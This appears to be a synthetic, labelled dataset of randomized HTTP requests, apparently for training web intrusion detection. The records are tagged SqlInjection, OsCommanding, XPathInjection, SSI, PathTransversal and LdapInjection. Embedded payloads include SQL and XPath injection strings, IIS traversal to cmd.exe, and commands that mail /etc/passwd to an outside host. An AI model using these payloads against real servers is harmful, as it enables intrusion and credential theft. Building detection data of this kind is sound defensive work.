Content-Language: mow,l,yoade
Content-Encoding: identity
Content-Location: http://www.i7eAicei.ch/taxatr0t/Iastt/RUt88s/pocsahdr.zip
Content-MD5: eW51ZWJ2ZW5yb3M1Nmxvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Dec 09 08:19:14 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: 208.146.106.221
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-932;q=0.4, windows-1250;q=0.7, iso-8859-9;q=0.8
Accept-Encoding: gzip, gzip, deflate;q=0.9
Accept-Language: nlitrcma-eUIEo;q=0.6, as2va-ee6sapi, 6atdcu-dwosYio;q=0.5, rN-rebaipnt
Cache-Control: min-fresh=68
Client-ip: 162.232.160.26
Cookie: ny=ebrNvdatO;deleteXtpucbgsoundTWELj=tHdmexecthpnntsi|6eehtpass;Ta=daetmoedt9ioukqdio;4hlq=dFp0MzMSmTv@;RB@XJfrom=onrcps;JBeSQA@pRS=594399
Cookie2: $Version="3"
Date: Sun, 12 Nov 06 04:51:59 UTC
ETag: "RZdC@lsq9GUwPpK44b"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Mon, 09 Jul 07 10:41:30 GMT
If-Unmodified-Since: Wed, 02 Dec 09 07:55:38 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Feb 07 13:33:24 UTC
Max-Forwards: 10
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: Basic c2lubGg6ZTh6eWU=
Range: -312
Referer: http://www.8rBl.st/bisnauA/ftr5efj/nNZtf/Way3/nosIehbu.php3
TE: trailers,deflate;q=0.2
Trailer: Accept
User-Agent: sianseea/3.9.8.0.0
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 189.182.231.41
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Kckl.adminDyC=hjof08QD&yaplzrn6=N&Uoeihte=88&et=ahajSph8ehsdsk2&oco9gbe=0&76rextykzule9s=e9_&nselrZ2eldrt5ha=)   (   |  (displayName=had*) (name=  had*  )(   mail=had*    )&grittal=es~?4&usletaldaaiYMr=fL.&-8Rsock_streamghpIBtF=8&eq=w-OES@6lQ&NMMXv2Wr=hNeyt&qouYtonmtaca=zyyoj&rdpu=08&nBsET3sp=8S23Zyox

End - Id: 36929
Start - Id: 35237
class: SqlInjection
GET /pZaorda/h7sTcitxir7bpi4f/ehun4tmtll6kyen7e/QAij2Ft/irGwxordLrfMefa/fAslsao/rts/nwy/p.8vR8jcky/HexecG2il/@MrgD.jpg?odws=nqWiy6APHO&b2ws=tnlfetsompLS9enuno&0fm.lumetaPzI=%27+++OR++++%27Usbfcznnl%27++%3C+++%27X&evaha=iC1.&hhaamxeooiemo=tt&hjreeohsD1=262764&Lg7_jlike8g_y@=idKyM0E4&emeempRn=7&fsrqywddKo=seomJ9osnumochaz&tmEdiG=tnthhttps HTTP/1.1
Host: www.dlynnCos7.cz
Connection: TChxt
Accept: audio/*
Accept-Charset: iso-8859-2, x-mac-greek, windows-1250;q=0.6, ks_c_5601-1987
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: omreu=ci
Client-ip: 61.19.198.20
Cookie: ID8Oe2where=eta :rk;W0deq_0-tj=o569;5todrwo0esix=rn9SY-BgIG
Cookie2: $Version="55"
Date: Mon, 07 Apr 08 02:02:38 UTC
ETag: W/"nMX2urdi29dkIXdpcQr"
Expect: 100-continue
From: niuRy@wlrqea.com
If-Modified-Since: Sat, 15 Mar 08 03:54:00 GMT
If-Unmodified-Since: Sat, 14 Nov 09 10:32:54 GMT
If-Match: *
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 301
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Digest nonce
Range: -5631,75-
Referer: /fxdm/lkkbhlEh.dll
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.3 (compatible; MSIE 2.4; SunOS sun4u; aluBr20; oaeh)
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 0.5 www.aiom.js, peI/9.7 www.eleett.jpeg:7, FTP/1.7 5.145.27.180:51704
Transfer-Encoding: compress
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35237
Start - Id: 43293
class: OsCommanding
GET /Dtols9acO/cniU2ftoonNeNi/ioBmHjw8GJ@2cHt1/wUd3JBN9@K/rPEsqmrfg0T/tG588dUzr4kUex/3cds0tidalAanacy/87/iyS2/cJ/mFZ8qOgx6qhENx7YTs.dll?jlivandut=9&tkn7aersg1snpr=t0hlosC%29htpass&atiooR=r%27o%2Bekro%3Bja&ant5rTaln0tu=oops+++%3B+++++cat+++++%2Fetc%2Fpasswd+++%7C++++mail+++your%40awv.com HTTP/1.1
Host: 53.232.75.55
Connection: npeevr
Accept: */*
Accept-Charset: cp-936;q=0.5, x-mac-icelandic;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 254.228.196.43
Cookie: 3locationh1=mPro8vtuju;toimcsegjwttsw=tmptgr3=ths;s2nE=eE/9%darA[Brg;cs1D6=rooPsstylen 1nh5c;AU5SGai=7855309
Cookie2: $Version="9"
Date: Wed, 28 Mar 07 06:49:35 UTC
ETag: "6dhinw17JjJyr_-."
Expect: mb9t=tpt6m;rlemLtar
From: nJanczi@m0dios.gov
If-Modified-Since: Sat, 15 Jul 06 22:36:39 CET
If-Unmodified-Since: Sun, 26 Apr 09 18:31:51 UTC
If-Match: *
If-None-Match: "L7XVVs9eNE0iZyugMM.5"
If-Range: Wed, 14 Oct 09 18:05:54 CET
Max-Forwards: 4787
MIME-Version: 0.7
Pragma: eeqd5r=fg
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dG9ybGdoaTpvaWhtbmVoZQ==
Range: 16-654699,-01,-6683
Referer: http://www.oarraes.st/dyOsfo.mpg
TE: chunked,trailers
Trailer: Range
User-Agent: ldns (2UX8r2rkH; aQeIV6BaD; tqpbvutlKq; uSuuMnS2)
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/2.6 200.86.88.200, izekyc/8.6 www.ys1ea.tiff
Transfer-Encoding: t7yI
Upgrade: hhiwe/3.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 33268910997830583
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43293
Start - Id: 49487
class: XPathInjection
GET /acrZBJhShWLTH4yWi.cfm?lnedaRasdH84t=sdalYSX3lW&ti2toeqi=st+8h&ptgnq0t=timg9Hw%3Ah8from&eYcEp2lzimgF9Z=e&aa1zredkl=%29r&dNtNi5s=iwata0aiGmemheezd&si3r20=sOUvWp6&WSyeiaOSacu3r=1979&cNrrgacw8=58339+or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++46211%3D HTTP/1.1
Host: www.w6lIk.be:3
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=107
Client-ip: 243.204.148.120
Cookie: ee4=3;UYa4DUekur1=421204255;etnHole3uoemo=27206546
Cookie2: $Version="3"
Date: Tue, 10 Feb 04 15:17:24 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: sryguohs@efdmr.biz
If-Modified-Since: Wed, 27 Jun 07 19:14:08 GMT
If-Unmodified-Since: Sun, 16 Jan 05 16:32:22 GMT
If-Match: *
If-None-Match: "WUznIkBAx-Ym0liD6wgx"
If-Range: *
Max-Forwards: 4696
MIME-Version: 4.4
Pragma: das2eea='eht'
Proxy-Authorization: NTLM bGlvb2Vzc2Flc3Rvb3Flb3Rvcm5zZTRqZXhpc2hsZGliaXVhZ2h0aQ==
Authorization: NTLM Y0llbXRldEpvem1nMHRhYXFoZTdIc3hwYWd6ZXd1dzFzb2lzb3RzRQ==
Range: -012
Referer: http://www.biei4.ch/2miy/gRee/zhxmoxo.html
TE: trailers,chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 4.9; 2n-iR; rv:6.5.7) Gecko/11367746
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49487
Start - Id: 39186
class: SSI
PUT /troOwuht/9scsoto/eu0-Eofw-/eUUptLgr8V.mdb? HTTP/1.0
Content-Length: 44
Content-Language: nt,u,gCli
Content-Encoding: compress
Content-Location: /rlnHssdG.gif
Content-MD5: YWF0b21uaXRjb2FuamlwdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:04:18 GMT
Last-Modified: Fri, 07 Jul 06 05:59:18 GMT
Host: www.yunjemt.org
Connection: keep-alive
Accept: text/*, image/gif, text/html;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.6, identity
Accept-Language: *;q=0.1
Cache-Control: max-age=45208
Client-ip: 240.32.159.203
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="86"
Date: Wed, 05 Jan 05 03:31:13 UTC
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
From: usoekn@3fnpm.it
If-Modified-Since: Tue, 04 Jul 06 15:59:16 GMT
If-Unmodified-Since: Wed, 17 Oct 07 03:28:46 CET
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: "WUzOpY14sUZ.7C74-"
If-Range: Mon, 19 Dec 05 02:18:24 GMT
Max-Forwards: 3
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Digest realm
Range: -4,-09852,71-
Referer: /3otot/lnollph/aHiee.cgi
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 3.2; ro-sn; rv:5.7.1) Gecko/33537061
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: FTP/4.0 102.30.170.153:3838, 3.4 www.OQnl.shtml
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uI=<!--#echo var="date_gmt"-->

End - Id: 39186
Start - Id: 40185
class: SSI
GET /Pb2p/dIAQCZ1aHK9kJ.9fKW/eYzFUYJSX5Uh/slcatrsxAAofl/t4r591ytsi2E/1T6NBKydp-/Xu/yhanpaYoOlehsgeO/uodtwlsdfwtroco/U9/th2s6j6htyeeA/lYtLZZwRmmZh4fNV.php?eiAfhe1nkeihzi=i+passthruhFch+&goeGmlit=1tmnet%28+oegl+&oieextDmilsg=%3C%21--+++%23exec+++++cmd%3D%22%2Fbin%2Fmail++++e6A.com+++%3C++%2Fetc%2Fpasswd%22--%3E&veaaw0eohf=odocumenthed&ahhnaH=47&ieIhg=5boot.inih%2Buwriwp-o%25nw5&enwOzte9doTFimW=updatelbeoi%2B%2BEx&d6Rxm.t=oqr&tue6ke=rueS8lt7n&oaf=haeat&n9t=aOKTaYP_TV HTTP/1.1
Host: www.AaIen3mva.ch:80
Connection: tdseo
Accept: */*
Accept-Charset: cp-936, iso-8859-4, shift_jis;q=0.3, iso-2022-jp;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 113.54.199.202
Cookie: whisteoaj=53528;fXqhKWu99NR=sto
Cookie2: $Version="405"
Date: Thu, 24 Sep 09 19:06:01 GMT
ETag: "nsJIJ8dwE41Z_@egNq"
Expect: 100-continue
From: woeiond@etiwPn.it
If-Modified-Since: Fri, 30 May 08 16:52:15 UTC
If-Unmodified-Since: Sat, 28 Jun 08 21:21:16 CET
If-Match: *
If-None-Match: "E_yQGn3cE93KGQyAV"
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 7451
Pragma: ej1hicts='in'
Proxy-Authorization: Digest username="UloTorac"
Authorization: Digest username="aeclc"
Range: 95170-36663
Referer: http://otTsrsjH.gov/msmle8/k43t/trdrsuht/osnoslnl/cj8uigb.pl
TE: trailers
Trailer: Max-Forwards
User-Agent: czna (eZ_13k5eHH; dNVLDsDggz; tAl9m3n9o; s1gb0KtD)
UA-CPU: 68000
UA-OS: Mac OS X
Via: HTTP/8.9 222.98.149.14:22, 4.3 118.44.168.103
Transfer-Encoding: gzip
Upgrade: aiaEi/3.2, nenl/7.3
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40185
Start - Id: 44340
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.yherayrbpi.fr
Connection: nees
Accept: audio/*, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: pa-i4TrTt, EcUe1-xb, 99Ttn-5s;q=0.2, htaaetm-jloirnid
Cache-Control: no-store
Client-ip: 216.220.28.19
Cookie: eoencoxteaYre=douj;7ciso9onq73tno=90783647
Cookie2: $Version="29"
Date: Thu, 24 May 07 24:21:56 UTC
ETag: "kwXTvO@4m-@MIi_"
Expect: tnstr3=Ht7tPac;rhjSmod
From: Q0IEeur@zgehtbi59.uk
If-Modified-Since: Thu, 12 Jul 07 17:27:36 CET
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: "0Ed436M-Rj3k1HF1-n"
If-None-Match: *
If-Range: Fri, 09 Mar 07 22:55:02 UTC
Max-Forwards: 717
MIME-Version: 5.3
Pragma: Eiilnn='tisHs'
Proxy-Authorization: Digest nc=e078eCD8
Authorization: a9cb rpta8oc=nteya
Range: -4,7986-,046-946045
Referer: /etybt/oee9r/tifg70/std7Mste.php
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.9 (Windows; U; Win 9x 0.8; 3q-mt; rv:7.5.9) Gecko/56651468
UA-CPU: x86
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: FTP/7.4 155.23.177.191:61496, HTTP/6.5 www.rsSe7.htm
Transfer-Encoding: foNoia
Upgrade: ecbon/5.1, 0dstft/4.6, rh6g/9.8
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44340
Start - Id: 44656
class: PathTransversal
GET /xPGhj/ej0iPO1Kqy-my2c/cv_m/uvKPxcf/nmswzjES-xo6neWw/tOhgp5hwEa/pAROEhoKM5fmx64d3cTA/P3D/efur7pmd/rewcs/nanzdoGftanr1true/aCCTLy7FFIpD6ZH0kFy.msf?sIsm=%3Fp4processing-instructionzmaa6gc&rql=4&iauw=boatie%28g HTTP/1.1
Host: 219.93.106.44
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: reoag7-ltJotovn;q=0.4
Cache-Control: min-fresh=5314
Client-ip: 8.237.241.62
Cookie: noacaabH=4684893;4nnammhysiuejdf=collection(     file:///c:/eni/gihA185.xml     )
Cookie2: $Version="1"
Date: Mon, 12 Jun 06 12:13:59 GMT
ETag: "U_ZNTM@RFl.A2VUa"
Expect: 100-continue
From: acaeehhr@trstter.st
If-Modified-Since: Sat, 19 May 07 01:36:25 CET
If-Unmodified-Since: Thu, 12 Jan 06 15:16:40 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 30 May 07 04:38:40 UTC
Max-Forwards: 8801
Pragma: pR=h
Proxy-Authorization: eaowfh leeewnas=9Iy2e
Authorization: Digest realm
Range: 2485-,266-3,-56504
Referer: http://www.oaa0tj.de/puo2eune/ecQs/enagibe/ebltn/kyemtee.asmx
TE: gzip
Trailer: Connection
User-Agent: skiwreapEaoeSel6eT
UA-CPU: MIPS
UA-Disp: 508,1015,8
UA-Color: color8
UA-Pixels: 8872x5937
Via: HTTP/5.5 www.r0mordr.gif
Transfer-Encoding: compress
Upgrade: ervl/3.1, rWat5n/5.8
Warning: 611 www.mA5n.jpeg "Ebst3d" 
X-Serial-Number: 0781889348466
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44656
Start - Id: 44126
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.mntelhmuoa.ch
Connection: hpoeR
Accept: text/html, audio/*;q=0.3
Accept-Charset: x-mac-greek;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 196.173.120.66
Cookie: A1k=eoanksrsibWIt;stabDre6raevi=2752728
Cookie2: $Version="066"
Date: Sat, 03 Jun 06 24:55:12 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 21 May 04 16:42:07 CET
If-Unmodified-Since: Fri, 24 Oct 08 14:24:06 UTC
If-Match: "uyPE5HkkTKbicCYJ"
If-None-Match: *
If-Range: "M5VFg45@l@shuRpOl-.@"
Max-Forwards: 345
MIME-Version: 3.4
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM a2Rvb2xtZ2h1aWFqcnNiZGVwaGVwdHNlcHRFN2xzdHNsNUU=
Range: 2856-325921,765830-7785,3752-597
Referer: /0bgM1e/v8lUg/degfoett.php4
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 3Bp4nwyoss
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: deflate
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44126
Start - Id: 41824
class: SqlInjection
GET /0xlrthAEdsoDhozoYm.js?mdmD1eivtds=0201209&asatfabhoigXb=%27%29+UNION+++++ALL+++SELECT+++++613++++FROM++utshe++WHERE++++%28+%27%27++%3D+++%27&vbscriptPo.@0http=+wehttpsnittIi-p2ipatQr&not2fcnl=b%5Ce&haehdtndnvst=6lsivNhotddi0t1&wiuSAass=9744028056&oembzsiando5tR=sFENt21Q5j_&soe=reorMatxsrh&eetie=it8dsuatLiif&emik=echoeautoexec&tsleT0a=3xsdt%3Ae&Sezan=ebe HTTP/1.1
Host: www.4uoMbs9.com
Connection: close
Accept: application/rtf;q=0.0, application/zip, video/*;q=0.2
Accept-Charset: cp-950;q=0.8, x-mac-japanese, euc-cn;q=0.0, shift_jis, iso-2022-jp
Accept-Encoding: gzip;q=0.8
Accept-Language: d-4, v4Z-bteOcie
Cache-Control: only-if-cached
Client-ip: 200.70.15.74
Cookie: npdn=rlbn;htosr2niP=073824882;poeza=> ib;Fb=8;YCfromwDzOS8nw=Se
Cookie2: $Version="571"
Date: Sat, 08 Sep 07 18:40:50 UTC
ETag: W/"Tc@F6JEKUDHdlFzOY"
Expect: jao4e=iser
From: n7s1Iyet@heedldG.st
If-Modified-Since: Sat, 04 Mar 06 05:39:39 UTC
If-Unmodified-Since: Thu, 02 Dec 04 12:00:12 CET
If-Match: "Z950G3Wh9L7iZ-qA"
If-None-Match: "cCddMlT9Dyf7Y4L"
If-Range: "8NtDxuPzEQZDFPeS"
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic aGUzczpsZXRh
Range: 1-,-175130,8812-321864
Referer: /iana/zwoatele/boc31o/nctru4/oagyw.asp
TE: trailers
Trailer: Max-Forwards
User-Agent: 6a0rtoqef
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: identity
Upgrade: howg0r/2.1, n5ai7/3.4, 4bnu/8.0, 5mO/2.4
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41824
Start - Id: 48829
class: XPathInjection
GET /ireumockbpeKna/td7w-l_vUAg7p90/e54/h1cftiauapeayhnel/iBsrqEhqJt9M5grdzsG/x29srLcIYxpSaW/eEhlwlojpnfbors1sota/mI5IRiimWO/YIcAqWiqhr/mnmFtsEAlh1R8sIn.jpg?egunjS=jnol%3ErT6sO&rtateoes=%25uhd3&sogacrcdeiilmar=9559++or+++uv%2Fee9%2Fuh%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D+or+++++21175%3D HTTP/1.1
Host: www.paensyh.gov:80
Connection: ntswt
Accept: */*
Accept-Charset: x-mac-greek, iso-8859-3, utf-7, windows-1255;q=0.5, iso-2022-kr;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: e=a
Client-ip: 166.142.219.107
Cookie: rLR7hsAlt=m6anr(
Cookie2: $Version="352"
Date: Wed, 01 Jun 05 15:34:42 GMT
ETag: W/"HxRplA_cWdZdDiPv"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Wed, 20 Jun 07 02:53:32 GMT
If-Unmodified-Since: Sat, 27 Aug 05 10:03:21 GMT
If-Match: "lxFdUFz0NH3TEB9"
If-None-Match: "2w.-vTOal7sa3joabI"
If-Range: *
Max-Forwards: 48
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: mozwE tpuHu=of2keub
Range: 5920-3
Referer: /sq2ot.tiff
TE: chunked,trailers
Trailer: Referer
User-Agent: yGuxaP http://www.Cardsdp.com
UA-CPU: StrongARM
UA-Disp: 8370,749,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 8.9 www.otraoau.jpeg:42
Transfer-Encoding: identity
Upgrade: qdiue/5.0
Warning: 056 www.f4xe1oNm.htm "ehiaia" "Mon, 17 Nov 08 12:21:14 CET"
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48829
Start - Id: 37084
class: LdapInjection
GET /hpasswdJ6CFv81LKhaving/duLuHNgzvZRDpIyiu7/u@gP7khN6XMT9/b3fbodyatobh35.jpg?rmzfoTfi=dn18letmptnna%2Fynmyetelnetq&rtroaLod=et&auiAeeofogeee=eslS%26eeel%5B9Io&saa93vc=dt&rkaznOcMp=+amailanull&he=oplen4Irunapo&h2aje=knP_cMqEF&I0eLk=cls%40nnjeprocessing-instruction9o&nm=0222%29%28%26%28objectClass%3Dttsv%29%28%7C%28sn++++%3D+ip%29%28cn%3DE++J*%29%29&5reed2=%3B3%40qnhnte&yteca=61566584&xtn6dftipNi8iu=oawbqstf69v&iphShomsd=wwa9atdii%28s HTTP/1.1
Host: www.atab0i.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, iso-2022-jp;q=0.9
Accept-Encoding: gzip;q=0.4, compress;q=0.6
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 154.56.180.14
Cookie: JmOe=sehhdoiitabaW;nhi=9Iij0;odvbscriptt=i\s7;__httpsmyS=ayoa(sn<erTri;e9Xi-v5W=06318;oooa6d1ed61Hd=icuesdm
Cookie2: $Version="6"
Date: Wed, 14 Jan 09 09:06:34 CET
ETag: "zuQy6UP2oJx68ZPfZ"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Thu, 20 Aug 09 20:35:59 UTC
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 4.7
Pragma: aluq='yw'
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic MmFnY2FlOmR0ZVNpZDhh
Range: -5
Referer: /oRsesk7t/etlos/ioor/Ynernie.asmx
TE: deflate,trailers
Trailer: From
User-Agent: Mozilla/9.7 (compatible; meleHArst1; Mac OS X; i4tgzhem; ni3tafoa)
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7857x018
Via: 4.0 www.Aasuneu.gif:17, 5.5 78.123.220.64, HTTP/5.9 www.tacbdhd.htm
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 997 www.raeb.htm "tslwaeaovnN5em24i" "Fri, 27 Jan 06 03:45:51 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37084
Start - Id: 45013
class: PathTransversal
GET /7txY6F.H/tdosFethigrtre/ralljV1OZCPstdin/aeayCtaj/i-unionBvfJEw/sositi/ub3Vn0c.gGVWpgSiew.tiff?reduaidu=doc%28++file%3A%2F%2F%2Fc%3A%2Ftt%2Fesit.xml+%29 HTTP/1.1
Host: 156.46.205.254
Connection: keep-alive
Accept-Encoding: 
Accept-Language: tfhN9-oiro9, aeCut0aa-aevi;q=0.5, croai-ii, bldjsCle-bt0;q=0.7
Cache-Control: no-cache
Cookie: T03y=8065;oo=7n;5Ne1.68_auO8=09395
If-Modified-Since: Thu, 14 Sep 06 14:08:34 UTC
If-Unmodified-Since: Wed, 25 Feb 09 14:55:13 CET
Max-Forwards: 9
Referer: http://www.ghlrf8H2.uk/ogopue/1ut6Hfm.png
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 0.7; tR-en; rv:2.4.7) Gecko/74534633
UA-Disp: 8043,576,8
Via: FTP/9.9 www.nKcW.css, 7.1 www.ectn.html

null

End - Id: 45013
Start - Id: 43083
class: OsCommanding
PUT /seUVmycm9WhSlu6Nry/z5hI6yfAF/h3t3/Oujiosaesh/uq/TSNgKbUNGzlibGform3/clatoosaaLtqe/tp7n/jiaSf/tenhsiEuStfce8lmaora.php? HTTP/1.0
Content-Length: 63
Content-Language: uQrnmHo,rrenxol,esonO3m
Content-Encoding: gzip
Content-Location: /pcu2/fof4i/nszsP3nl/nhetlm.mspx
Content-MD5: NGFsZXNlaTZiMmVhdGRyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Apr 08 10:23:26 GMT
Last-Modified: Wed, 28 Jan 09 17:47:41 GMT
Host: www.nelt.be
Connection: ouDqnp
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: 8non1etn-on
Cache-Control: max-stale
Client-ip: 56.53.104.65
Cookie: .c_CB=1905804123;enfnv9t7est=024809;tx3q=rcpen;rbteainninmt=956920;edo=iVrwBg4.bV;fue8=enw4T9te
Cookie2: $Version="3"
Date: Thu, 16 Jul 09 23:56:26 GMT
ETag: "FDUu-B@bbhg0TtN"
Expect: 100-continue
From: twrTzya@l1npan.ch
If-Modified-Since: Sun, 28 Dec 08 24:43:14 UTC
If-Unmodified-Since: Sat, 19 Mar 05 12:30:04 UTC
If-None-Match: "CdoZIlMjF2UeQr0mgYGU"
